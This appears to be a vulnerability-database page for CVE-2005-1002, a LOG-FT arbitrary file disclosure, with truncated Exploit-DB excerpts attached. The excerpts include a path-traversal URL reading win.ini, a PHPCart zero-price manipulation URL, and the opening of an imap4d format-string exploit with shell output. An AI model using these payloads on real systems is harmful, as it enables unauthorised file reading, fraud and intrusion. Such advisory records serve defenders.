CVE-2005-1002
published 2005-05-02CVE-2005-1002: logwebftbs2000.exe in Logics Software File Transfer (LOG-FT) allows remote attackers to read arbitrary files via modified (1) VAR_FT_LANG and (2) VAR_FT_TMPL…
PriorityP427medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.91%
85.2th percentile
logwebftbs2000.exe in Logics Software File Transfer (LOG-FT) allows remote attackers to read arbitrary files via modified (1) VAR_FT_LANG and (2) VAR_FT_TMPL parameters.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
exploitdb·2005-09-10
CVE-2005-2878 GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
---
/*
* GNU Mailutils 0.6 imap4d 'search' format string exploit.
* Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
*
* $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
* [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
* [+] By clem1.
* [+] connecting to: 127.0.0.1:143
* [+] authentification: completed.
* [+] format string: sended
* [+] shellcode sended.
* [+] Bingo.
*
* id;
* uid=1000(clem1) gid=1002(mail) groups=0(root)
*
* Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struc
Exploit-DB
PHPCart - Input Validation
exploitdb·2005-04-27
CVE-2005-1398 PHPCart - Input Validation
PHPCart - Input Validation
---
source: https://www.securityfocus.com/bid/13406/info
PHPCart is prone to a remote input validation vulnerability. The issue exists because the software fails to sufficiently sanitize URI parameter data that is employed when computing product charges.
A remote attacker may exploit this issue to manipulate invoice and payment charges for a specific PHPCart order.
http://www.example.com/phpcart.php?action=add&id=1002&descr=Mobile%20Phone&price=0&postage=&quantity=100
Exploit-DB
Logics Software LOG-FT - Arbitrary File Disclosure
exploitdb·2005-04-05
CVE-2005-1002 Logics Software LOG-FT - Arbitrary File Disclosure
Logics Software LOG-FT - Arbitrary File Disclosure
---
source: https://www.securityfocus.com/bid/12998/info
LOG-FT is reported prone to an arbitrary file disclosure vulnerability. This issue results from an access validation error and can allow a remote attacker to disclose sensitive data.
It is reported that an attacker can simply issue a specially crafted HTTP GET request to disclose sensitive files in the context of the affected Web server.
Information disclosed through this attack may expose sensitive data that may be used to carry out further attacks against a computer. It is not confirmed whether this issue may also allow an attacker to upload arbitrary files.
http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini
http://www.example.com/l
No writeups or analysis indexed.
2005-05-02
Published